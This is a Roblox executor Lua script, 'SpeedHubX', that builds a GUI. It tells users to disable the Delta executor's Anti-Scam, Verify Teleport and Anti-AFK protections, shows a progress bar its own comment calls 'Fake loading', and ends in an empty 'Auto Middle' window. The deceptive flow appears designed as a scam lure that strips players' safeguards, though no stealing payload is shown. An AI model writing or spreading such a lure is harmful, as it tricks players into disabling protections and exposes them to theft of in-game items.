--// SpeedHubX GUI Flow Script

-- Starter UI library
local TweenService = game:GetService("TweenService")

-- Helper function to create UI elements quickly
local function create(class, props, parent)
    local inst = Instance.new(class)
    for k,v in pairs(props) do
        inst[k] = v
    end
    inst.Parent = parent
    return inst
end

-- Main ScreenGui
local screenGui = create("ScreenGui", {Name = "SpeedHubXGui", ResetOnSpawn = false}, game.CoreGui)

---------------------------------------------------
-- PANEL 1: Instructions + Checkbox + Confirm
---------------------------------------------------
local panel1 = create("Frame", {
    Size = UDim2.new(0, 400, 0, 300),
    Position = UDim2.new(0.5, -200, 0.5, -150),
    BackgroundColor3 = Color3.fromRGB(30,30,30),
    BorderSizePixel = 0,
    Visible = true
}, screenGui)

create("UICorner", {CornerRadius = UDim.new(0,8)}, panel1)

local title = create("TextLabel", {
    Size = UDim2.new(1, -20, 0, 40),
    Position = UDim2.new(0, 10, 0, 10),
    BackgroundTransparency = 1,
    Text = "Turn off all the following Delta settings, or the script will fail.",
    TextColor3 = Color3.fromRGB(255,0,0),
    Font = Enum.Font.SourceSansBold,
    TextScaled = true,
    TextWrapped = true
}, panel1)

local instructions = create("TextLabel", {
    Size = UDim2.new(1, -20, 0, 120),
    Position = UDim2.new(0, 10, 0, 60),
    BackgroundTransparency = 1,
    Text = "• Disable Anti-AFK\n• Disable Verify Teleport\n• Disable Anti-Scam\n\nAfter disabling, check the box to continue.",
    TextColor3 = Color3.fromRGB(255,255,255),
    Font = Enum.Font.SourceSans,
    TextSize = 20,
    TextWrapped = true,
    TextYAlignment = Enum.TextYAlignment.Top
}, panel1)

local checkbox = create("TextButton", {
    Size = UDim2.new(0, 30, 0, 30),
    Position = UDim2.new(0, 20, 1, -50),
    BackgroundColor3 = Color3.fromRGB(50,50,50),
    Text = ""
}, panel1)

local cbMark = create("TextLabel", {
    Size = UDim2.new(1,0,1,0),
    BackgroundTransparency = 1,
    Text = "✓",
    TextColor3 = Color3.fromRGB(0,255,0),
    Font = Enum.Font.SourceSansBold,
    TextScaled = true,
    Visible = false
}, checkbox)

local confirmBtn = create("TextButton", {
    Size = UDim2.new(0, 100, 0, 40),
    Position = UDim2.new(1, -120, 1, -50),
    BackgroundColor3 = Color3.fromRGB(100,100,100),
    Text = "Confirm",
    TextColor3 = Color3.fromRGB(255,255,255),
    Font = Enum.Font.SourceSansBold,
    TextScaled = true,
    AutoButtonColor = false
}, panel1)
confirmBtn.Active = false

local cbChecked = false
checkbox.MouseButton1Click:Connect(function()
    cbChecked = not cbChecked
    cbMark.Visible = cbChecked
    if cbChecked then
        confirmBtn.BackgroundColor3 = Color3.fromRGB(0,170,0)
        confirmBtn.Active = true
    else
        confirmBtn.BackgroundColor3 = Color3.fromRGB(100,100,100)
        confirmBtn.Active = false
    end
end)

---------------------------------------------------
-- PANEL 2: Warning Popup
---------------------------------------------------
local panel2 = create("Frame", {
    Size = UDim2.new(0, 380, 0, 150),
    Position = UDim2.new(0.5, -190, 0.5, -75),
    BackgroundColor3 = Color3.fromRGB(50,0,0),
    BorderSizePixel = 0,
    Visible = false
}, screenGui)
create("UICorner", {CornerRadius = UDim.new(0,8)}, panel2)

local warnLabel = create("TextLabel", {
    Size = UDim2.new(1, -20, 1, -20),
    Position = UDim2.new(0, 10, 0, 10),
    BackgroundTransparency = 1,
    Text = "Your executor might still have Verify Teleport / Anti-Scam enabled. Please disable these.\nREJOIN for the script to take effect",
    TextColor3 = Color3.fromRGB(255,255,255),
    Font = Enum.Font.SourceSansBold,
    TextWrapped = true,
    TextScaled = true
}, panel2)

---------------------------------------------------
-- PANEL 3: Loading Screen
---------------------------------------------------
local panel3 = create("Frame", {
    Size = UDim2.new(0, 400, 0, 200),
    Position = UDim2.new(0.5, -200, 0.5, -100),
    BackgroundColor3 = Color3.fromRGB(20,20,20),
    BorderSizePixel = 0,
    Visible = false
}, screenGui)
create("UICorner", {CornerRadius = UDim.new(0,8)}, panel3)

local loadLabel = create("TextLabel", {
    Size = UDim2.new(1,0,0,50),
    Position = UDim2.new(0,0,0,20),
    BackgroundTransparency = 1,
    Text = "Loading GAG Script",
    TextColor3 = Color3.fromRGB(255,255,255),
    Font = Enum.Font.SourceSansBold,
    TextScaled = true
}, panel3)

local progressBar = create("Frame", {
    Size = UDim2.new(0,0,0,20),
    Position = UDim2.new(0,0,0.5,0),
    BackgroundColor3 = Color3.fromRGB(0,170,255)
}, panel3)
create("UICorner", {CornerRadius = UDim.new(0,8)}, progressBar)

local percentage = create("TextLabel", {
    Size = UDim2.new(1,0,0,30),
    Position = UDim2.new(0,0,1,-40),
    BackgroundTransparency = 1,
    Text = "0%",
    TextColor3 = Color3.fromRGB(255,255,255),
    Font = Enum.Font.SourceSansBold,
    TextScaled = true
}, panel3)

---------------------------------------------------
-- PANEL 4: Final Window UI
---------------------------------------------------
local panel4 = create("Frame", {
    Size = UDim2.new(0, 500, 0, 350),
    Position = UDim2.new(0.5, -250, 0.5, -175),
    BackgroundColor3 = Color3.fromRGB(25,25,25),
    BorderSizePixel = 0,
    Visible = false
}, screenGui)
create("UICorner", {CornerRadius = UDim.new(0,8)}, panel4)

local panel4title = create("TextLabel", {
    Size = UDim2.new(1,0,0,50),
    BackgroundTransparency = 1,
    Text = "SpeedHubX - Auto Middle",
    TextColor3 = Color3.fromRGB(0,170,255),
    Font = Enum.Font.SourceSansBold,
    TextScaled = true
}, panel4)

---------------------------------------------------
-- Button Actions
---------------------------------------------------
confirmBtn.MouseButton1Click:Connect(function()
    if not cbChecked then return end
    panel1.Visible = false
    panel2.Visible = true

    task.delay(5, function()
        panel2.Visible = false
        panel3.Visible = true

        -- Fake loading for 5 seconds
        for i = 1, 100 do
            progressBar.Size = UDim2.new(i/100, 0, 0, 20)
            percentage.Text = tostring(i).."%"
            task.wait(0.05)
        end

        panel3.Visible = false
        panel4.Visible = true
    end)
end)
